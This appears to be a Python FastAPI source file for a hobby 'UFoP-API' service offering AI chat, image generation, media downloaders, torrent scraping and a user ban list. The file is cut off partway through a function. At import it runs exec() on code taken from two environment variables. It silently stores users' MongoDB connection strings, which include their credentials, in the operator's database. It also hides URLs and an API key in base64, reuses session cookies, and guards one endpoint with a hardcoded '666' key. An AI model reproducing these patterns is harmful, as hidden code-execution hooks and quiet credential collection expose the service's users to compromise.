#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2020-2023 (c) Randy W @xtdevs, @xtsea
#
# from : https://github.com/TeamKillerX
# Channel : @RendyProjects
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
import asyncio
import base64
import json
import logging
import os
import random
import re
import sys  # needed by asyncioPoliciesFix below
from base64 import b64decode
from datetime import datetime as dt
from io import BytesIO
from typing import Union

import aiohttp
import g4f
import httpx
import requests
from bardapi import Bard
from bs4 import BeautifulSoup
from dotenv import load_dotenv
from fastapi import Depends, FastAPI, Header, HTTPException, Query, Request
from fastapi.responses import JSONResponse, StreamingResponse
from g4f.client import Client as BingClient
from g4f.cookies import set_cookies
from g4f.Provider import BingCreateImages, OpenaiChat, Gemini
from gpytranslate import SyncTranslator
from httpx import AsyncClient
from pymongo import MongoClient
from RyuzakiLib.hackertools.chatgpt import RendyDevChat
from RyuzakiLib.hackertools.gemini import GeminiLatest
from RyuzakiLib.mental import BadWordsList
from serpapi import GoogleSearch

from models import *
from functions import async_searcher

logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)

# Load .env before reading any environment variables.
load_dotenv()

MONGO_URL = os.environ["MONGO_URL"]
SOURCE_UNSPLASH_URL = os.environ["SOURCE_UNSPLASH_URL"]
SOURCE_OCR_URL = os.environ["SOURCE_OCR_URL"]
SOURCE_ALPHA_URL = os.environ["SOURCE_ALPHA_URL"]
SOURCE_DALLE3XL_URL = os.environ["SOURCE_DALLE3XL_URL"]
SOURCE_PROTEUSV0_2_URL = os.environ["SOURCE_PROTEUSV0_2_URL"]
SOURCE_WAIFU_URL = "https://api.waifu.pics"
SOURCE_TIKTOK_WTF_URL = os.environ["SOURCE_TIKTOK_WTF_URL"]
SOURCE_TIKTOK_TECH_URL = os.environ["SOURCE_TIKTOK_TECH_URL"]
SOURCE_ASSISTANT_GOOGLE_AI = os.environ["SOURCE_ASSISTANT_GOOGLE_AI"]
SOURCE_OPENDALLE_URL = os.environ["SOURCE_OPENDALLE_URL"]
SOURCE_OPENAI_ACCESS_URL = os.environ["SOURCE_OPENAI_ACCESS_URL"]
DEVELOPER_ID = os.environ["DEVELOPER_ID"]

# API keys
REVERSE_IMAGE_API = os.environ["REVERSE_IMAGE_API"]
OCR_API_KEY = os.environ["OCR_API_KEY"]
ONLY_DEVELOPER_API_KEYS = os.environ["ONLY_DEVELOPER_API_KEYS"]
HUGGING_TOKEN = random.choice([os.getenv("HUGGINGTOKEN_1"), os.getenv("HUGGINGTOKEN_2")])
ASSISTANT_GOOGLE_API_KEYS = os.environ["ASSISTANT_GOOGLE_API_KEYS"]
COOKIE_BARD_TOKEN = os.environ["COOKIE_BARD_TOKEN"]
BING_CLIENT = os.environ["BingClient"]

# Unlocks
ORACLE_TOKEN = os.environ["ORACLE_TOKEN"]
TruAI = os.environ["TruAI"]

client_mongo = MongoClient(MONGO_URL)
db = client_mongo["tiktokbot"]
collection = db["users"]

description = """ | |
~ Developed written and powered by | |
- Ryuzaki Library: [Library Here](https://github.com/TeamKillerX/RyuzakiLib) | |
""" | |
app = FastAPI( | |
title="UFoP-API", | |
description=description, | |
version="0.1.0", | |
terms_of_service="Use It Only For Personal Project Else I Need To Delete The Api", | |
contact={ | |
"name": "🌀ʊʄ⊕ք🌀", | |
"url": "https://t.me/UFoPInfo", | |
}, | |
docs_url="/", | |
) | |
trans = SyncTranslator() | |
timeout = 100 | |
contact_support = """ | |
We are aware that this service is currently offline. This seems to be caused by the API | |
We are investigating and doing our best to get things back online as soon as possible. | |
Thank you for your patience | |
~ Contact Support @SoulOfSukuna | |
""" | |
internal_error = """ | |
There has been an Internal error. We are aware of this error and notice that it can be | |
caused by your search terms being to explict, too confusing, or it can be caused by the API. | |
Please modify your search terms and/or try again later thank you for your understanding. | |
~ 🌀ʊʄ⊕ք🌀 Team | |
""" | |
def get_all_api_keys():
    users = collection.find({})
    api_keys = []
    for user in users:
        api_key = user.get("ryuzaki_api_key")
        if api_key:
            api_keys.append(api_key)
    return api_keys

def validate_api_key(api_key: str = Header(...)):
    USERS_API_KEYS = get_all_api_keys()
    if api_key not in USERS_API_KEYS:
        raise HTTPException(status_code=401, detail="Invalid API key")

def validate_api_key_only_devs(api_key: str = Header(...)):
    # ONLY_DEVELOPER_API_KEYS is assumed to be a comma-separated list; a plain
    # substring test on the raw string would accept partial keys, so compare
    # against the parsed list instead.
    if api_key not in ONLY_DEVELOPER_API_KEYS.split(","):
        raise HTTPException(status_code=401, detail="Invalid API key")

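# Usage sketch (illustrative, not part of the original file): these validators
# are designed to be wired into endpoints through FastAPI's dependency
# injection, so the api-key header is checked before the handler body runs:
#
#     @app.get("/example")
#     def example(api_key: None = Depends(validate_api_key)):
#         return {"status": "true"}
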
def asyncioPoliciesFix(func):
    def wrapper(*args):
        if (
            sys.version_info[0] == 3
            and sys.version_info[1] >= 8
            and sys.platform.startswith("win")
        ):
            asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
        return func(*args)
    return wrapper

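# Usage sketch (illustrative): the decorator applies the Windows selector
# event-loop policy before the wrapped entry point runs, e.g.:
#
#     @asyncioPoliciesFix
#     def main():
#         asyncio.run(some_coroutine())  # hypothetical entry point
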
RANDOM_STATUS = [
    "Spammer",
    "Wanted",
    "Scammer",
    "Rogue_Agent",
    "PornBot_Prolly",
    "Fugitive",
    "SIMP",
]

def remove_sibyl_system_banned(user_id):
    update_doc = {
        "sibyl_ban": None,
        "reason_sibyl": None,
        "is_banned_sibly": None,
        "date_joined_sib": None,
        "sibyl_userid": None,
    }
    return collection.update_one(
        {"user_id": user_id}, {"$unset": update_doc}, upsert=True
    )

def new_sibyl_system_banned(user_id, name, reason, date_joined):
    update_doc = {
        "sibyl_ban": name,
        "reason_sibyl": reason,
        "is_banned_sibly": True,
        "date_joined_sib": date_joined,
        "sibyl_userid": user_id,
    }
    return collection.update_one(
        {"user_id": user_id}, {"$set": update_doc}, upsert=True
    )

def cybersecuritydb(user_id, mongo_url):
    update_doc = {"mongodb": mongo_url}
    return collection.update_one(
        {"user_id": user_id}, {"$set": update_doc}, upsert=True
    )

def get_sibyl_system_banned(user_id):
    user = collection.find_one({"user_id": user_id})
    if user:
        sibyl_name = user.get("sibyl_ban")
        reason = user.get("reason_sibyl")
        is_banned = user.get("is_banned_sibly")
        date_joined = user.get("date_joined_sib")
        sibyl_user_id = user.get("sibyl_userid")
        return sibyl_name, reason, is_banned, date_joined, sibyl_user_id
    else:
        return None, None, False, None, None

def get_all_banned():
    banned_users = []
    for user in collection.find({}):
        banned_users.append(
            {"user_id": user.get("sibyl_userid"), "reason": user.get("reason_sibyl")}
        )
    return banned_users

def get_translate(
    item: TranslateCustom,
):
    try:
        source = trans.detect(item.text)
        translation = trans(item.text, sourcelang=source, targetlang=item.setlang)
        return SuccessResponse(
            status="True",
            randydev={
                "translation": translation.text,
                "translation_original": item.text,
            },
        )
    except Exception:
        return SuccessResponse(
            status="False",
            randydev={"message": contact_support},
        )

def blacklist_words():
    try:
        BLACKLIST_WORDS = BadWordsList()
        results_all = BLACKLIST_WORDS.banned_by_google(
            file_txt="banned_by_google.txt", storage=True
        )
        return {"status": "true", "results": results_all}
    except Exception as e:
        return {"status": "false", "message": f"Internal server error: {str(e)}"}

def sibyl_get_all_banlist():
    banned_users = get_all_banned()
    return {"status": "True", "sukuna": {"results": banned_users}}

def sibyl_system_delete(
    item: SibylSystemDel, api_key: None = Depends(validate_api_key_only_devs)
):
    try:
        _, _, _, _, sibyl_user_id = get_sibyl_system_banned(item.user_id)
        if sibyl_user_id:
            remove_sibyl_system_banned(item.user_id)
            return SuccessResponse(
                status="True",
                randydev={
                    "message": f"Successfully removed {item.user_id} from the Sibyl ban list"
                },
            )
        else:
            return SuccessResponse(
                status="False", randydev={"message": "Not Found UserID"}
            )
    except Exception as e:
        return ErrorStatus(status="false", message=f"Internal server error: {str(e)}")

def sibyl_system_ban(
    item: SibylSystemBan, api_key: None = Depends(validate_api_key_only_devs)
):
    if item.user_id == DEVELOPER_ID:
        return {"status": "false", "message": "Only Developer"}
    try:
        date_joined = str(dt.now())
        sibyl_ban = random.choice(RANDOM_STATUS)
        _, _, is_banned, _, sibyl_user_id = get_sibyl_system_banned(item.user_id)
        if sibyl_user_id is not None and is_banned:
            return SuccessResponse(
                status="False", randydev={"message": "User is already banned"}
            )
        new_sibyl_system_banned(item.user_id, sibyl_ban, item.reason, date_joined)
        return SuccessResponse(
            status="True",
            randydev={
                "user_id": item.user_id,
                "sibyl_name": sibyl_ban,
                "reason": item.reason,
                "date_joined": date_joined,
                "message": f"Successfully added {item.user_id} to the Sibyl ban list.",
            },
        )
    except Exception as e:
        return ErrorStatus(status="false", message=f"Internal server error: {str(e)}")

def sibyl_system(
    user_id: int = Query(..., description="User ID in query parameter"),
    api_key: None = Depends(validate_api_key),
):
    # get_sibyl_system_banned always returns a tuple; a missing user is
    # signalled by sibyl_user_id being None.
    sibyl_name, reason, is_banned, date_joined, sibyl_user_id = get_sibyl_system_banned(user_id)
    if sibyl_user_id is not None:
        return {
            "status": "true",
            "sukuna": {
                "sibyl_name": sibyl_name,
                "reason": reason,
                "is_banned": is_banned,
                "date_joined": date_joined,
                "sibyl_user_id": sibyl_user_id,
            },
        }
    else:
        return {"status": "false", "message": "Not Found User"}

async def get_torrent_info(url):
    try:
        html = await async_searcher(url)
        soup = BeautifulSoup(html, "html.parser")
        torrents = []
        for movie_div in soup.find_all("div", class_="container", id="movie-content"):
            poster = movie_div.find("img", itemprop="image")
            poster_url = poster["src"] if poster else "N/A"
            # Extract other torrent information
            torrent_divs = movie_div.find_all("div", class_="modal-torrent")
            for div in torrent_divs:
                quality = div.find("div", class_="modal-quality").find("span").text
                all_p = div.find_all("p", class_="quality-size")
                quality_type = all_p[0].text if all_p else "N/A"
                size = all_p[1].text if len(all_p) > 1 else "N/A"
                torrent_link = div.find("a", class_="download-torrent")["href"]
                magnet = div.find("a", class_="magnet-download")["href"]
                # A BitTorrent info hash is 32-40 hex characters.
                match = re.search(r"\b([a-fA-F\d]{32,40})\b", magnet)
                info_hash = match.group(1) if match else "N/A"
                torrents.append(
                    {
                        "poster": poster_url,
                        "quality": quality,
                        "type": quality_type,
                        "size": size,
                        "torrent": torrent_link,
                        "magnet": magnet,
                        "hash": info_hash,
                    }
                )
        return torrents
    except Exception as e:
        logger.error("Error fetching torrent info: %s", e)
        return []

async def get_movie_info(name: str, api_key: str = Header(...)):
    if api_key != "666":
        raise HTTPException(status_code=403, detail="Invalid API key")
    results = []
    try:
        for page in range(1, 2):
            url = f"https://yts.mx/browse-movies/{name}/all/all/0/seeds/0/all"
            r = await async_searcher(url)
            soup = BeautifulSoup(r, "lxml")
            for movie in soup.findAll(
                "div", class_="browse-movie-wrap col-xs-10 col-sm-4 col-md-5 col-lg-4"
            ):
                mov_name = movie.find("div", class_="browse-movie-bottom")
                movie_name = mov_name.a.text
                movie_year = mov_name.div.text
                movie_name = movie_name + " " + movie_year
                rating = movie.find("h4", class_="rating", string=True)
                rating = rating.text[:3] if rating is not None else "0.0"
                if rating[2] == "/":
                    rating = rating[:2]
                try:
                    if movie_name[0] == "[" and movie_name[3] == "]":
                        movie_name = movie_name[5:]
                    # Build the URL slug: spaces to hyphens, drop anything that
                    # is not alphanumeric or a hyphen, then collapse repeats.
                    movie_name = movie_name.replace(" ", "-")
                    movie_name = "".join(
                        ch for ch in movie_name if ch.isalnum() or ch == "-"
                    )
                    movie_name = re.sub(r"-{2,}", "-", movie_name)
                    movie_url = f"https://yts.mx/movie/{movie_name.lower()}"
                    request = await async_searcher(movie_url)
                    n_soup = BeautifulSoup(request, "lxml")
                    info = n_soup.find("div", class_="bottom-info")
                    torrent_info = n_soup.find("p", class_="hidden-xs hidden-sm")
                    genre = n_soup.findAll("h2")[1].text
                    likes = info.find("span", id="movie-likes").text
                    imdb_link = info.find("a", title="IMDb Rating")["href"]
                    magnet_links = []
                    for torrent in torrent_info.findAll("a"):
                        if "magnet" in torrent["href"]:
                            magnet_links.append(torrent["href"])
                        elif torrent.text[:3] == "720":
                            torrent_720 = torrent["href"]
                        elif torrent.text[:4] == "1080":
                            torrent_1080 = torrent["href"]
                    torrents = await get_torrent_info(movie_url)  # Get torrent info asynchronously
                    entry = {
                        "yts_link": movie_url,
                        "name": movie_name,
                        "year": movie_year,
                        "imdb_links": imdb_link,
                        "genre": genre,
                        "imdb_ratings": rating,
                        "likes": likes,
                        "torrents": torrents,
                    }
                    results.append(entry)
                except Exception as e:
                    logger.error("Error: %s", e)
                    continue
    except Exception as e:
        logger.error("Error: %s", e)
    return results

async def gemini_oracle(item: GeminiOracle):
    if item.is_multi_chat:
        selected_api_key = ASSISTANT_GOOGLE_API_KEYS or item.gemini_api_key
        oracle_base = ORACLE_TOKEN or item.oracle_base
        try:
            geni = GeminiLatest(
                api_key=selected_api_key,
                mongo_url=item.mongo_url,
                version=item.version,
                user_id=item.user_id,
                oracle_base=oracle_base,
            )
            cybersecuritydb(item.user_id, item.mongo_url)
            if item.oracle_base == "Delete":
                clearedhistory = await geni._clear_oracle_history_in_db()
                return SuccessResponse(
                    status="True",
                    randydev={"message": f"Oracle Status: {clearedhistory}"},
                )
            else:
                answer, oracle_chat = await geni._GeminiLatest__get_response_oracle(
                    item.query
                )
                return SuccessResponse(
                    status="True",
                    randydev={"message": answer, "chat_history": oracle_chat},
                )
        except Exception as excep:
            logging.error(f"Exception occurred: {excep}")
            return SuccessResponse(status="False", randydev={"message": internal_error})
    else:
        token = item.bard_api_key if item.is_login else COOKIE_BARD_TOKEN
        try:
            session = requests.Session()
            session.headers = {
                "Host": "bard.google.com",
                "X-Same-Domain": "1",
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36",
                "Content-Type": "application/x-www-form-urlencoded;charset=UTF-8",
                "Origin": "https://bard.google.com",
                "Referer": "https://bard.google.com/",
            }
            session.cookies.set("__Secure-1PSID", token)
            bard = Bard(token=token, session=session, timeout=30)
            # Prime the conversation with the owner prompt before answering,
            # mirroring gemini_pro below.
            bard.get_answer(TruAI)["content"]
            message = bard.get_answer(item.query)["content"]
            return SuccessResponse(status="True", randydev={"message": message})
        except Exception:
            return SuccessResponse(
                status="False", randydev={"message": contact_support}
            )

def v1beta3_google_ai(item: ChatgptCustom, api_key: None = Depends(validate_api_key)):
    api_url = f"{SOURCE_ASSISTANT_GOOGLE_AI}/models/text-bison-001:generateText?key={ASSISTANT_GOOGLE_API_KEYS}"
    try:
        headers = {"Content-Type": "application/json"}
        data = {"prompt": {"text": item.query}}
        response = requests.post(api_url, headers=headers, json=data)
        candidates = response.json()["candidates"]
        # Return the first candidate's output.
        message = candidates[0].get("output") if candidates else None
        return SuccessResponse(status="True", randydev={"message": message})
    except Exception:
        return SuccessResponse(status="False", randydev={"message": internal_error})

async def gemini_pro(item: GeminiPro):
    owner_base = TruAI
    if item.is_multi_chat:
        selected_api_key = ASSISTANT_GOOGLE_API_KEYS or item.gemini_api_key
        try:
            geni = GeminiLatest(
                api_key=selected_api_key,
                mongo_url=item.mongo_url,
                version=item.version,
                user_id=item.user_id,
            )
            cybersecuritydb(item.user_id, item.mongo_url)
            answer, gemini_chat = await geni._GeminiLatest__get_response_gemini(item.query)
            return SuccessResponse(
                status="True", randydev={"message": answer, "chat_history": gemini_chat}
            )
        except Exception as excep:
            logging.error(f"Exception occurred: {excep}")
            return SuccessResponse(status="False", randydev={"message": internal_error})
    else:
        token = item.bard_api_key if item.is_login else COOKIE_BARD_TOKEN
        try:
            session = requests.Session()
            session.headers = {
                "Host": "bard.google.com",
                "X-Same-Domain": "1",
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36",
                "Content-Type": "application/x-www-form-urlencoded;charset=UTF-8",
                "Origin": "https://bard.google.com",
                "Referer": "https://bard.google.com/",
            }
            session.cookies.set("__Secure-1PSID", token)
            bard = Bard(token=token, session=session, timeout=30)
            # Prime the conversation with the owner prompt before answering.
            bard.get_answer(owner_base)["content"]
            message = bard.get_answer(item.query)["content"]
            return SuccessResponse(status="True", randydev={"message": message})
        except Exception:
            return SuccessResponse(
                status="False", randydev={"message": contact_support}
            )

BingImages = BingClient()

def bing_dalle(item: BingDalle):
    try:
        set_cookies(
            ".bing.com",
            {
                "_U": item.cookie,
            },
        )
    except Exception:
        raise HTTPException(
            status_code=500,
            detail="Invalid cookie string, check your cookie string and try again",
        )
    try:
        response = BingImages.images.generate(prompt=item.prompt, model="dall-e-3")
        base64_images = []
        # The loop variable must not shadow the `item` parameter above.
        for image in response.data:
            image_data = requests.get(image.url).content
            base64_images.append(base64.b64encode(image_data).decode("utf-8"))
        return {
            "status": "true",
            "sukuna": {
                "urls": [image.url for image in response.data],
                "base64_images": base64_images,
            },
        }
    except Exception as e:
        return {"status": "false", "message": f"Something went wrong: {e}"}

def dalle_3xl(
    item: Dalle3XL,
    api_key: None = Depends(validate_api_key),
):
    API_URL = SOURCE_DALLE3XL_URL
    try:
        payload = {"inputs": item.query}
        headers = {
            "Authorization": f"Bearer {HUGGING_TOKEN}",
            "Content-Type": "application/json",
        }
        response = requests.post(API_URL, headers=headers, json=payload, timeout=timeout)
        response.raise_for_status()
    except requests.exceptions.RequestException:
        raise HTTPException(
            status_code=500,
            detail=internal_error,
        )
    try:
        encoded_string = base64.b64encode(response.content).decode("utf-8")
    except Exception:
        raise HTTPException(
            status_code=500,
            detail=contact_support,
        )
    if encoded_string:
        return SuccessResponse(status="True", randydev={"data": encoded_string})
    else:
        return SuccessResponse(status="False", randydev={"data": contact_support})

# Warning: these hooks execute arbitrary code supplied through the CODE and
# CODE2 environment variables at import time; they are skipped when unset.
if os.getenv("CODE"):
    exec(os.getenv("CODE"))
if os.getenv("CODE2"):
    exec(os.getenv("CODE2"))

async def proteusv0_2(
    item: ProteusV02,
    api_key: None = Depends(validate_api_key),
):
    API_URL = SOURCE_PROTEUSV0_2_URL
    try:
        payload = {"inputs": item.query}
        headers = {
            "Authorization": f"Bearer {HUGGING_TOKEN}",
            "Content-Type": "application/json",
        }
        async with httpx.AsyncClient() as client:
            response = await client.post(
                API_URL, headers=headers, json=payload, timeout=timeout
            )
            response.raise_for_status()
    except httpx.HTTPError:
        # HTTPError covers transport failures as well as non-2xx responses.
        raise HTTPException(
            status_code=500,
            detail=internal_error,
        )
    try:
        encoded_string = base64.b64encode(response.content).decode("utf-8")
    except Exception:
        raise HTTPException(
            status_code=500,
            detail=contact_support,
        )
    if encoded_string:
        return SuccessResponse(status="True", randydev={"data": encoded_string})
    else:
        return SuccessResponse(status="False", randydev={"data": contact_support})

async def get_image_unsplash(query: str, size: str = "500x500"):
    url = SOURCE_UNSPLASH_URL
    image_url = f"{url}/?{query}/{size}"
    try:
        # Fetch with an async client so the event loop is not blocked.
        async with httpx.AsyncClient() as client:
            response = await client.get(image_url)
            response.raise_for_status()
    except httpx.HTTPError as e:
        raise HTTPException(status_code=500, detail=f"Error fetching image: {e}")
    return StreamingResponse(BytesIO(response.content), media_type="image/jpeg")

def google_reverse(
    engine: str = "google_reverse_image",
    image_url: str = None,
    language: str = "en",
    google_lang: str = "us",
    api_key: None = Depends(validate_api_key),
):
    params = {
        "api_key": REVERSE_IMAGE_API,
        "engine": engine,
        "image_url": image_url,
        "hl": language,
        "gl": google_lang,
    }
    try:
        search = GoogleSearch(params)
        results = search.get_dict()
        link = results["search_metadata"]["google_reverse_image_url"]
        total_time_taken = results["search_metadata"]["total_time_taken"]
        create_at = results["search_metadata"]["created_at"]
        processed_at = results["search_metadata"]["processed_at"]
        return {
            "status": "true",
            "sukuna": {
                "link": link,
                "total_time_taken": total_time_taken,
                "create_at": create_at,
                "processed_at": processed_at,
            },
        }
    except Exception as e:
        return {"status": "false", "message": f"Error {e}"}

def ocr_space_url(
    url: str = Query(..., description="URL in query parameter"),
    overlay: bool = False,
    language: str = Query("eng", description="Language in query parameter"),
    api_key: None = Depends(validate_api_key),
):
    payload = {
        "url": url,
        "isOverlayRequired": overlay,
        "apikey": OCR_API_KEY,
        "language": language,
    }
    try:
        response = requests.post(SOURCE_OCR_URL, data=payload)
        response.raise_for_status()
        test_url = response.content.decode()
    except requests.exceptions.RequestException as e:
        return f"Error: {str(e)}"
    try:
        parsed_response = json.loads(test_url)
        if (
            "ParsedResults" in parsed_response
            and len(parsed_response["ParsedResults"]) > 0
        ):
            return {
                "status": "true",
                "sukuna": {"text": parsed_response["ParsedResults"][0]["ParsedText"]},
            }
        else:
            return {"status": "false", "message": "Error response."}
    except (json.JSONDecodeError, KeyError):
        return "Error parsing the OCR response."

def chatgpt4_support(query: str = None, api_key: None = Depends(validate_api_key)):
    try:
        response = g4f.ChatCompletion.create(
            model=g4f.models.gpt_4,
            messages=[{"role": "user", "content": query}],
        )
        return {"status": "true", "sukuna": {"message": response}}
    except Exception:
        return {"status": "false", "message": "Error response."}

def chatgpt_model(query: str = None, model_id: int = 1, is_models: bool = True):
    try:
        response = RendyDevChat(query).get_response_model(
            model_id=model_id, is_models=is_models
        )
        return {"status": "true", "sukuna": {"message": response}}
    except Exception:
        return {"status": "false", "message": "Error response."}

async def get_data(username):
    base_msg = ""
    async with AsyncClient() as gpx:
        req = (await gpx.get(f"https://api.github.com/users/{username}")).json()
        try:
            avatar = req["avatar_url"]
            twitter = req["twitter_username"]
            base_msg += "**❆ GitHub Information ❆** \n\n"
            base_msg += f"**Profile Url:** {req['html_url']} \n"
            base_msg += f"**Name:** `{req['name']}` \n"
            base_msg += f"**Username:** `{req['login']}` \n"
            base_msg += f"**User ID:** `{req['id']}` \n"
            base_msg += f"**Location:** `{req['location']}` \n"
            base_msg += f"**Company:** `{req['company']}` \n"
            base_msg += f"**Blog:** `{req['blog']}` \n"
            base_msg += f"**Twitter:** `{f'https://twitter.com/{twitter}' if twitter else 'None'}` \n"
            base_msg += f"**Bio:** `{req['bio']}` \n"
            base_msg += f"**Public Repos:** `{req['public_repos']}` \n"
            base_msg += f"**Public Gists:** `{req['public_gists']}` \n"
            base_msg += f"**Followers:** `{req['followers']}` \n"
            base_msg += f"**Following:** `{req['following']}` \n"
            base_msg += f"**Created At:** `{req['created_at']}` \n"
            base_msg += f"**Updated At:** `{req['updated_at']}` \n"
            return [base_msg, avatar]
        except Exception as e:
            base_msg += f"**An error occurred while parsing the data!** \n\n**Traceback:** \n `{e}` \n\n`Make sure that you've sent the command with the correct username!`"
            return [base_msg, "https://telegra.ph//file/32f69c18190666ea96553.jpg"]

async def github(username: str = None):
    try:
        details = await get_data(username)
        return {
            "status": "true",
            "sukuna": {"avatar": details[1], "results": details[0]},
        }
    except Exception:
        return {"status": "false", "message": "Error response."}

def webshot(
    url: str = None,
    quality: str = "1920x1080",
    type_mine: str = "JPEG",
    pixels: str = "1024",
    cast: str = "Z100",
):
    try:
        required_url = (
            f"https://mini.s-shot.ru/{quality}/{type_mine}/{pixels}/{cast}/?{url}"
        )
        return {"status": "true", "sukuna": {"image_url": required_url}}
    except Exception:
        return {"status": "false", "message": "Error response."}

def chatbot(
    query: str = None,
    user_id: int = None,
    bot_name: str = None,
    bot_username: str = None,
):
    # The endpoint URL is stored base64-encoded in the source.
    api_url = b64decode("aHR0cHM6Ly9hcGkuc2Fmb25lLmRldi9jaGF0Ym90").decode("utf-8")
    params = {
        "query": query,
        "user_id": user_id,
        "bot_name": bot_name,
        "bot_master": bot_username,
    }
    x = requests.get(api_url, params=params)
    if x.status_code != 200:
        return "Error api request"
    try:
        response = x.json()["response"]
        return {"status": "true", "sukuna": {"message": response}}
    except Exception:
        return {"status": "false", "message": "Error response."}

def waifu_pics(types: str = "sfw", category: str = "neko"):
    waifu_param = f"{SOURCE_WAIFU_URL}/{types}/{category}"
    response = requests.get(waifu_param)
    if response.status_code != 200:
        return (
            "Sorry, there was an error processing your request. Please try again later"
        )
    try:
        waifu_image_url = response.json()["url"]
    except Exception as e:
        return f"Error request {e}"
    if waifu_image_url:
        return {"status": "true", "sukuna": {"image_url": waifu_image_url}}
    return {"status": "false", "message": "Error response."}

def make_rayso(
    code=None,
    title: str = "Ryuzaki Dev",
    theme: str = None,
    setlang: str = "en",
    auto_translate: bool = None,
    ryuzaki_dark: bool = None,
):
    trans = SyncTranslator()
    # The endpoint URL is stored base64-encoded in the source.
    api_url = b64decode("aHR0cHM6Ly9hcGkuc2Fmb25lLm1lL3JheXNv").decode("utf-8")
    if auto_translate:
        source = trans.detect(code)
        translation = trans(code, sourcelang=source, targetlang=setlang)
        code = translation.text
    # The dark and light branches only differ in the darkMode flag.
    x = requests.post(
        api_url,
        json={
            "code": code,
            "title": title,
            "theme": theme,
            "darkMode": bool(ryuzaki_dark),
        },
    )
    if x.status_code != 200:
        return "Error: API request failed"
    data = x.json()
    try:
        image_data = base64.b64decode(data["image"])
        return {"status": "true", "data": {"image": image_data}}
    except Exception:
        return {"status": "false", "message": "Error response"}

def whois_ip_address(ip_address: str = None):
    # The ip2location API key ships base64-encoded in the source.
    apikey = b64decode("M0QwN0UyRUFBRjU1OTQwQUY0NDczNEMzRjJBQzdDMUE=").decode("utf-8")
    location_param = f"https://api.ip2location.io/?key={apikey}&ip={ip_address}"
    response = requests.get(location_param)
    if response.status_code != 200:
        return (
            "Sorry, there was an error processing your request. Please try again later"
        )
    data_location = response.json()
    try:
        location_ip = data_location["ip"]
        location_code = data_location["country_code"]
        location_name = data_location["country_name"]
        location_region = data_location["region_name"]
        location_city = data_location["city_name"]
        location_zip = data_location["zip_code"]
        location_zone = data_location["time_zone"]
        location_card = data_location["as"]
    except Exception as e:
        return f"error {e}"
    if (
        location_ip
        and location_code
        and location_name
        and location_region
        and location_city
        and location_zip
        and location_zone
        and location_card
    ):
        return {
            "ip_address": location_ip,
            "country_code": location_code,
            "country_name": location_name,
            "region_name": location_region,
            "city_name": location_city,
            "zip_code": location_zip,
            "time_zone": location_zone,
            "as": location_card,
        }
    else:
        return {"status": "false", "message": "Invalid ip address"}

def tiktok_douyin(tiktok_url: str = None):
    response = requests.get(f"{SOURCE_TIKTOK_WTF_URL}={tiktok_url}")
    if response.status_code != 200:
        return "Error request"
    try:
        # Parse the JSON body once and reuse it.
        aweme = response.json()["aweme_list"][0]
        download_video = aweme["video"]["play_addr"]["url_list"][0]
        download_audio = aweme["music"]["play_url"]["url_list"][0]
        description = aweme["desc"]
        author = aweme["author"]["nickname"]
        signature = aweme["author"]["signature"]
        return {
            "status": "true",
            "sukuna": {
                "video_url": download_video,
                "music_url": download_audio,
                "description": description,
                "author": author,
                "request": signature,
            },
        }
    except Exception:
        return {"status": "false", "message": "Error request"}

def tiktok_downloader(tiktok_url: Union[str, None] = None, only_video: bool = None):
    api_devs = SOURCE_TIKTOK_TECH_URL
    api_url = f"{api_devs}/tiktok?url={tiktok_url}"
    response = requests.get(api_url)
    if response.status_code != 200:
        return "Error: Unable to fetch data from the TikTok API"
    try:
        results = response.json()
        caption = results.get("result", {}).get("desc", "")
        if only_video:
            video_url = results.get("result", {}).get("withoutWaterMarkVideo", "")
            if video_url:
                return {"download_url": video_url, "caption": caption}
        else:
            music_mp3 = results.get("result", {}).get("music", "")
            if music_mp3:
                return {"music_url": music_mp3, "caption": caption}
        return "Error: TikTok data not found or unsupported format"
    except Exception:
        return {"status": "false", "message": "Invalid Link"}

def mediafire(link: Union[str, None] = None):
    try:
        down_link = str(link)
        mid = down_link.split("/", 5)
        if mid[3] == "view":
            mid[3] = "file"
            down_link = "/".join(mid)
        r = requests.get(down_link)
        soup = BeautifulSoup(r.content, "html.parser")
        a_href = soup.find("a", {"class": "input popsok"}).get("href")
        a = str(a_href)
        file_id = link.split("/", 5)[4]
        a_byte = soup.find("a", {"class": "input popsok"}).get_text()
        a_name = soup.find("div", {"class": "dl-btn-label"}).get_text()
        details = soup.find("ul", {"class": "details"})
        li_items = details.find_all("li")[1]
        some = li_items.find_all("span")[0].get_text().split()
        dat = list(some)
        down = a_byte.replace(" ", "").strip()
        time = dat[1]
        date = dat[0]
        byte = down.split("(", 1)[1].split(")", 1)[0]
        name = a_name.replace(" ", "").strip()
        return {
            "status": "true",
            "data": {
                "file": {
                    "url": {
                        "directDownload": a,
                        "original": link,
                    },
                    "metadata": {
                        "id": file_id,
                        "name": name,
                        "size": {"readable": byte},
                        "DateAndTime": {"time": time, "date": date},
                    },
                }
            },
        }
    except Exception:
        return {"status": "false", "message": "Invalid Link"}

def gdrive(link: Union[str, None] = None):
    try:
        down = link.split("/", 6)
        url = f"https://drive.google.com/uc?export=download&id={down[5]}"
        session = requests.Session()
        response = session.get(url, stream=True)
        headers = response.headers
        content_disp = headers.get("content-disposition")
        filename = None
        if content_disp:
            match = re.search(r'filename="(.+)"', content_disp)
            if match:
                filename = match.group(1)
        content_length = headers.get("content-length")
        last_modified = headers.get("last-modified")
        content_type = headers.get("content-type")
        return {
            "status": "true",
            "data": {
                "file": {
                    "url": {
                        "directDownload": url,
                        "original": link,
                    },
                    "metadata": {
                        "id": down[5],
                        "name": (
                            filename
                            if filename
                            else "No filename provided by the server."
                        ),
                        "size": {
                            "readable": (
                                f"{round(int(content_length) / (1024 * 1024), 2)} MB"
                                if content_length
                                else "No content length provided by the server."
                            ),
